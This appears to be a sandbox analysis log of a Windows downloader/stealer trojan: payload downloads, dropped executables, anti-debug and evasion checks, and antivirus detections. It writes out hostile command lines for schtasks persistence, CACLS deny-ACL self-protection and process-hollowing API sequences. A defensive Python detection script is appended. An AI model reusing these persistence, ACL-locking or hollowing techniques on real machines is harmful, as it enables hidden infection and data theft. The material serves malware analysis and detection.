heap_dep_bypass: 1
length: 4096
protection: 16 (PAGE_EXECUTE)
base_address: 0x051f0000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

recv

buffer: HTTP/1.1 200 OK Date: Wed, 18 Oct 2023 22:53:55 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 18 Oct 2023 11:43:05 GMT ETag: "5e000-607fc247c97bc" Accept-Ranges: bytes Content-Length: 385024 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program [binary PE image follows: MZ/PE headers, "This program cannot be run in DOS mode.", sections .text .rdata .data .pdata .rsrc .reloc]
received: 2920
socket: 1544
1 2920 0
section UPX1 (name UPX1, virtual_address 0x0030f000, virtual_size 0x00117000, size_of_data 0x00116200) entropy 7.99959819553 description A section with a high entropy has been found
entropy 0.999101930849 description Overall entropy of this PE file is high
url https://docs.microsoft.com/windows/win32/fileio/maximum-file-path-limitation
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Bypass DEP rule disable_dep
section UPX0 description Section name indicates UPX
section UPX1 description Section name indicates UPX
section UPX2 description Section name indicates UPX
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2148 CREDAT:145409
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
host 104.194.128.170
host 117.18.232.200
host 172.86.97.117
host 193.42.32.29
host 85.217.144.143
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 32768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000000000000e8
1 0 0

NtAllocateVirtualMemory

process_identifier: 3060
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000009c
1 0 0
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
description untilmathematics.exe tried to sleep 2728163 seconds, actually delayed analysis time by 2728163 seconds
description nhdues.exe tried to sleep 141 seconds, actually delayed analysis time by 141 seconds
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wjix28kKarinpgjAYr9zDmpj.bat
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hjWYWkkCY8Nyq0IVvM6rdei6.bat
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6p1uypRGfTUYYgl5UZ64RlVm.bat
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SaAj8ddbQ8wkYIxlMtU24PeF.bat
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ny6g2bRbZ1WF9N4OGUF7Y267.bat
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KkUIGNWOEZ7SF0rQw5yOyBqw.bat
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QKmS6R2JXaTleGwL2IM1fGi1.bat
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\esNy7rk0zmYx5Vbij5LA4Nl6.bat
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
Time & API Arguments Status Return Repeated

LdrGetDllHandle

module_name: snxhk
module_address: 0x00000000
stack_pivoted: 0
3221225781 0

LdrGetDllHandle

module_name: snxhk
module_address: 0x00000000
stack_pivoted: 0
3221225781 0
file C:\Users\test22\Pictures\XHChe4TMuyQgPR4OrdooBhRa.exe
file C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe
file C:\Users\test22\Pictures\jsj9BnxQe1wUSt4fq4fFdIbl.exe
file C:\Users\test22\Pictures\2v4fymhYYNWC2FFg5XXDybVC.exe
file C:\Users\test22\Pictures\vtmaPKRXAfqpNkKfnPwslgoN.exe
file C:\Users\test22\Pictures\DhJlbLqN6jQFakonmgEZ33Ks.exe
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 3060
process_handle: 0x0000009c
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
process nhdues.exe useragent
process iexplore.exe useragent Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Process injection Process 2456 called NtSetContextThread to modify thread in remote process 3060
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 2005598660
registers.esp: 1638384
registers.edi: 0
registers.eax: 4206040
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000098
process_identifier: 3060
1 0 0
Process injection Process 840 resumed a thread in remote process 2060
Process injection Process 2456 resumed a thread in remote process 3060
Process injection Process 2148 resumed a thread in remote process 2844
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000000000000e4
suspend_count: 1
process_identifier: 2060
1 0 0

NtResumeThread

thread_handle: 0x00000098
suspend_count: 1
process_identifier: 3060
1 0 0

NtResumeThread

thread_handle: 0x000002f0
suspend_count: 1
process_identifier: 2844
1 0 0
cmdline cmd /k echo Y|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit
cmdline CACLS "..\1ff8bec27e" /P "test22:N"
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit
cmdline CACLS "..\1ff8bec27e" /P "test22:R" /E
cmdline CACLS "nhdues.exe" /P "test22:R" /E
cmdline CACLS "nhdues.exe" /P "test22:N"
Bkav W64.AIDetectMalware
DrWeb Trojan.DownLoader46.24761
Skyhigh Artemis!Trojan
McAfee Artemis!191FEBED315D
Cybereason malicious.123f58
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win64/GenKryptik.GPCL
APEX Malicious
Kaspersky UDS:Trojan-PSW.Win32.Stealerc.fom
Avast PWSX-gen [Trj]
Rising Trojan.Kryptik!8.8 (TFE:5:75OIvYcHgzD)
Trapmine suspicious.low.ml.score
Sophos Mal/Generic-S
Webroot W32.Trojan.Gen
Avira TR/AD.Nekark.htohz
Gridinsoft Ransom.Win64.Sabsik.sa
Microsoft Trojan:Win32/Casdet!rfn
ZoneAlarm VHO:Trojan-PSW.Win32.Stealerc.gen
Cylance unsafe
Panda Trj/Chgt.AD
Fortinet W64/GenKryptik.GMLD!tr
AVG PWSX-gen [Trj]
DeepInstinct MALICIOUS
dead_host 193.42.32.29:80
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000000000000b0
suspend_count: 1
process_identifier: 840
1 0 0

NtResumeThread

thread_handle: 0x00000000000000cc
suspend_count: 1
process_identifier: 840
1 0 0

CreateProcessInternalW

thread_identifier: 2064
thread_handle: 0x00000000000000e4
process_identifier: 2060
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000000000000e8
1 1 0

NtAllocateVirtualMemory

process_identifier: 2060
region_size: 32768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000000000000e8
1 0 0

NtResumeThread

thread_handle: 0x00000000000000e4
suspend_count: 1
process_identifier: 2060
1 0 0

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2060
1 0 0

NtResumeThread

thread_handle: 0x00000150
suspend_count: 1
process_identifier: 2060
1 0 0

NtResumeThread

thread_handle: 0x00000194
suspend_count: 1
process_identifier: 2060
1 0 0

NtResumeThread

thread_handle: 0x0000022c
suspend_count: 1
process_identifier: 2060
1 0 0

NtResumeThread

thread_handle: 0x00000354
suspend_count: 1
process_identifier: 2060
1 0 0

NtResumeThread

thread_handle: 0x000005d4
suspend_count: 1
process_identifier: 2060
1 0 0

NtResumeThread

thread_handle: 0x000005fc
suspend_count: 1
process_identifier: 2060
1 0 0

NtResumeThread

thread_handle: 0x00000620
suspend_count: 1
process_identifier: 2060
1 0 0

NtResumeThread

thread_handle: 0x0000064c
suspend_count: 1
process_identifier: 2060
1 0 0

NtResumeThread

thread_handle: 0x00000678
suspend_count: 1
process_identifier: 2060
1 0 0

NtResumeThread

thread_handle: 0x000006a4
suspend_count: 1
process_identifier: 2060
1 0 0

NtResumeThread

thread_handle: 0x000006d0
suspend_count: 1
process_identifier: 2060
1 0 0

NtResumeThread

thread_handle: 0x000006fc
suspend_count: 1
process_identifier: 2060
1 0 0

NtResumeThread

thread_handle: 0x00000728
suspend_count: 1
process_identifier: 2060
1 0 0

NtResumeThread

thread_handle: 0x0000074c
suspend_count: 1
process_identifier: 2060
1 0 0

NtResumeThread

thread_handle: 0x00000778
suspend_count: 1
process_identifier: 2060
1 0 0

NtResumeThread

thread_handle: 0x00000378
suspend_count: 1
process_identifier: 2060
1 0 0

NtResumeThread

thread_handle: 0x000005d8
suspend_count: 1
process_identifier: 2060
1 0 0

NtResumeThread

thread_handle: 0x000005dc
suspend_count: 1
process_identifier: 2060
1 0 0

NtResumeThread

thread_handle: 0x0000088c
suspend_count: 1
process_identifier: 2060
1 0 0

CreateProcessInternalW

thread_identifier: 2308
thread_handle: 0x00000928
process_identifier: 2304
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\Pictures\NsAOOuuxBVI141vT8Ty9RGNr.exe
track: 1
command_line: "C:\Users\test22\Pictures\NsAOOuuxBVI141vT8Ty9RGNr.exe"
filepath_r: C:\Users\test22\Pictures\NsAOOuuxBVI141vT8Ty9RGNr.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000092c
1 1 0

CreateProcessInternalW

thread_identifier: 2300
thread_handle: 0x00000910
process_identifier: 2296
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\Pictures\XHChe4TMuyQgPR4OrdooBhRa.exe
track: 1
command_line: "C:\Users\test22\Pictures\XHChe4TMuyQgPR4OrdooBhRa.exe"
filepath_r: C:\Users\test22\Pictures\XHChe4TMuyQgPR4OrdooBhRa.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000091c
1 1 0

NtResumeThread

thread_handle: 0x000008d8
suspend_count: 1
process_identifier: 2060
1 0 0

CreateProcessInternalW

thread_identifier: 2460
thread_handle: 0x000008bc
process_identifier: 2456
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe
track: 1
command_line: "C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe"
filepath_r: C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000008dc
1 1 0

NtResumeThread

thread_handle: 0x0000020c
suspend_count: 1
process_identifier: 2060
1 0 0

NtResumeThread

thread_handle: 0x000008d8
suspend_count: 1
process_identifier: 2060
1 0 0

NtResumeThread

thread_handle: 0x0000071c
suspend_count: 1
process_identifier: 2060
1 0 0

CreateProcessInternalW

thread_identifier: 2644
thread_handle: 0x000006dc
process_identifier: 2640
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\Pictures\jsj9BnxQe1wUSt4fq4fFdIbl.exe
track: 1
command_line: "C:\Users\test22\Pictures\jsj9BnxQe1wUSt4fq4fFdIbl.exe"
filepath_r: C:\Users\test22\Pictures\jsj9BnxQe1wUSt4fq4fFdIbl.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000728
1 1 0

CreateProcessInternalW

thread_identifier: 2700
thread_handle: 0x00000718
process_identifier: 2696
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\Pictures\2v4fymhYYNWC2FFg5XXDybVC.exe
track: 1
command_line: "C:\Users\test22\Pictures\2v4fymhYYNWC2FFg5XXDybVC.exe"
filepath_r: C:\Users\test22\Pictures\2v4fymhYYNWC2FFg5XXDybVC.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000694
1 1 0

NtResumeThread

thread_handle: 0x000006c0
suspend_count: 1
process_identifier: 2060
1 0 0

CreateProcessInternalW

thread_identifier: 2892
thread_handle: 0x00000634
process_identifier: 2888
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\Pictures\vtmaPKRXAfqpNkKfnPwslgoN.exe
track: 1
command_line: "C:\Users\test22\Pictures\vtmaPKRXAfqpNkKfnPwslgoN.exe"
filepath_r: C:\Users\test22\Pictures\vtmaPKRXAfqpNkKfnPwslgoN.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000638
1 1 0

NtResumeThread

thread_handle: 0x00000654
suspend_count: 1
process_identifier: 2060
1 0 0

CreateProcessInternalW

thread_identifier: 3020
thread_handle: 0x00000698
process_identifier: 3016
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\Pictures\DhJlbLqN6jQFakonmgEZ33Ks.exe
track: 1
command_line: "C:\Users\test22\Pictures\DhJlbLqN6jQFakonmgEZ33Ks.exe"
filepath_r: C:\Users\test22\Pictures\DhJlbLqN6jQFakonmgEZ33Ks.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000884
1 1 0

NtResumeThread

thread_handle: 0x0000088c
suspend_count: 1
process_identifier: 2060
1 0 0

CreateProcessInternalW

thread_identifier: 508
thread_handle: 0x0000077c
process_identifier: 2164
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\Pictures\tLqJinIq9eTQIYLlq5LobLYm.exe
track: 1
command_line: "C:\Users\test22\Pictures\tLqJinIq9eTQIYLlq5LobLYm.exe" --silent --allusers=0
filepath_r: C:\Users\test22\Pictures\tLqJinIq9eTQIYLlq5LobLYm.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000780
1 1 0

CreateProcessInternalW

thread_identifier: 2440
thread_handle: 0x000000000000000c
process_identifier: 2436
current_directory:
filepath:
track: 1
command_line: cmd /c hime.bat
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000000000000078
1 1 0

CreateProcessInternalW

thread_identifier: 2416
thread_handle: 0x0000000000000078
process_identifier: 2372
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\himeffectively.exe
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x000000000000000c
1 1 0

CreateProcessInternalW

thread_identifier: 2404
thread_handle: 0x00000274
process_identifier: 2400
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000027c
1 1 0

NtResumeThread

thread_handle: 0x00000240
suspend_count: 1
process_identifier: 2400
1 0 0

CreateProcessInternalW

thread_identifier: 2580
thread_handle: 0x00000264
process_identifier: 2576
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
filepath_r: C:\Windows\System32\schtasks.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000026c
1 1 0

CreateProcessInternalW

thread_identifier: 2740
thread_handle: 0x000001ec
process_identifier: 2736
current_directory: C:\Users\test22\AppData\Local\Temp\1ff8bec27e
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000258
1 1 0

CreateProcessInternalW

thread_identifier: 3064
thread_handle: 0x00000098
process_identifier: 3060
current_directory:
filepath: C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe
track: 1
command_line: "C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe"
filepath_r: C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x0000009c
1 1 0

NtGetContextThread

thread_handle: 0x00000098
1 0 0

NtUnmapViewOfSection

base_address: 0x00400000
region_size: 4096
process_identifier: 3060
process_handle: 0x0000009c
1 0 0

NtAllocateVirtualMemory

process_identifier: 3060
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000009c
1 0 0
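Added example (not ZeroBOX output and not code from the analysed sample): a Python script that parses records in the layout used above (API name, "key: value" lines, the numeric result line) and applies three rules to them: the schtasks /Create /SC MINUTE /MO 1 persistence for nhdues.exe, the CACLS /P "test22:N" deny-ACLs that lock the dropped file and its folder against the logged-on user, and the partial process-hollowing chain against the suspended copy of 1Dn33rKCA4dC8aXmng0BVypp.exe (CREATE_SUSPENDED, NtGetContextThread, NtUnmapViewOfSection at 0x00400000, then a PAGE_EXECUTE_READWRITE NtAllocateVirtualMemory at the same base). The sample log inside the script is constructed from the records above; the function names and the chain-length threshold are assumptions of the example.

```python
"""Detection rules over a ZeroBOX/Cuckoo-style API-call log (added example, not
part of the report). Flags minute-interval schtasks persistence, CACLS
deny-ACLs on a dropped binary, and the opening half of a hollowing chain."""
import re
from dataclasses import dataclass, field

# Constructed sample in the report's record format (values mirror the records
# above); the report's blank separator lines are optional to the parser.
SAMPLE_LOG = r"""
CreateProcessInternalW
process_identifier: 2576
command_line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
process_handle: 0x0000026c
1 1 0
CreateProcessInternalW
process_identifier: 2736
command_line: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit
process_handle: 0x00000258
1 1 0
CreateProcessInternalW
thread_handle: 0x00000098
process_identifier: 3060
filepath: C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
process_handle: 0x0000009c
1 1 0
NtGetContextThread
thread_handle: 0x00000098
1 0 0
NtUnmapViewOfSection
base_address: 0x00400000
process_handle: 0x0000009c
1 0 0
NtAllocateVirtualMemory
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
process_handle: 0x0000009c
1 0 0
"""

@dataclass
class Call:
    api: str
    args: dict[str, str] = field(default_factory=dict)

def parse_log(text: str) -> list[Call]:
    """A bare identifier line starts a record; "key: value" lines belong to it;
    the numeric result line ("1 1 0") is skipped."""
    calls: list[Call] = []
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        if re.fullmatch(r"[A-Za-z_]\w*", line):
            calls.append(Call(api=line))
        elif (m := re.match(r"(\w+):\s*(.*)", line)) and calls:
            calls[-1].args[m.group(1)] = m.group(2)
    return calls

def _cmdlines(calls: list[Call]):
    for c in calls:
        if c.api == "CreateProcessInternalW":
            yield c.args.get("process_identifier"), c.args.get("command_line", "")

def find_schtasks_persistence(calls: list[Call]) -> list[dict]:
    """schtasks /Create with schedule unit, interval and target pulled out."""
    hits = []
    for pid, cmd in _cmdlines(calls):
        if re.search(r'schtasks(\.exe)?"?\s+/Create', cmd, re.I):
            sc = re.search(r"/SC\s+(\w+)", cmd, re.I)
            mo = re.search(r"/MO\s+(\d+)", cmd, re.I)
            tr = re.search(r'/TR\s+"([^"]+)"', cmd, re.I)
            hits.append({"pid": pid, "schedule": sc and sc.group(1).upper(),
                         "every": mo and int(mo.group(1)), "target": tr and tr.group(1)})
    return hits

# CACLS /P <user>:N replaces the ACL with an explicit deny for that user.
CACLS_DENY = re.compile(r'CACLS\s+"([^"]+)"\s+/P\s+"([^":]+):N"', re.I)

def find_acl_self_protection(calls: list[Call]) -> list[dict]:
    return [{"pid": pid, "target": t, "user": u}
            for pid, cmd in _cmdlines(calls) for t, u in CACLS_DENY.findall(cmd)]

def find_hollowing_candidates(calls: list[Call]) -> list[dict]:
    """Correlate by handle: CREATE_SUSPENDED child -> NtGetContextThread on its
    thread -> NtUnmapViewOfSection -> RWX NtAllocateVirtualMemory at that base."""
    procs: dict[str, dict] = {}
    thread_of: dict[str, str] = {}
    for c in calls:
        a, ph, th = c.args, c.args.get("process_handle"), c.args.get("thread_handle")
        if c.api == "CreateProcessInternalW" and "CREATE_SUSPENDED" in a.get("creation_flags", ""):
            procs[ph] = {"pid": a.get("process_identifier"), "image": a.get("filepath"),
                         "base": None, "steps": ["CREATE_SUSPENDED"]}
            thread_of[th] = ph
        elif c.api == "NtGetContextThread" and th in thread_of:
            procs[thread_of[th]]["steps"].append("NtGetContextThread")
        elif c.api == "NtUnmapViewOfSection" and ph in procs:
            procs[ph]["base"] = a.get("base_address")
            procs[ph]["steps"].append("NtUnmapViewOfSection")
        elif (c.api == "NtAllocateVirtualMemory" and ph in procs
              and "PAGE_EXECUTE_READWRITE" in a.get("protection", "")
              and a.get("base_address") == procs[ph]["base"]):
            procs[ph]["steps"].append("NtAllocateVirtualMemory(RWX@base)")
    # three or more steps on one handle is the (assumed) reporting threshold
    return [p for p in procs.values() if len(p["steps"]) >= 3]
```

The hollowing rule reports a candidate, not a confirmed hollow: the records here stop at the RWX allocation, and the write into the child, NtSetContextThread and the resume of the suspended thread are not part of this excerpt. Correlating by handle value is only safe within one process's trace, because handle values are reused once closed (0x0000088c, for instance, names the thread in two separate NtResumeThread records above). The schtasks rule keys on the schedule unit rather than the task name, since /TN nhdues.exe is sample-specific while a one-minute re-launch of a file under %TEMP% is the reusable signal.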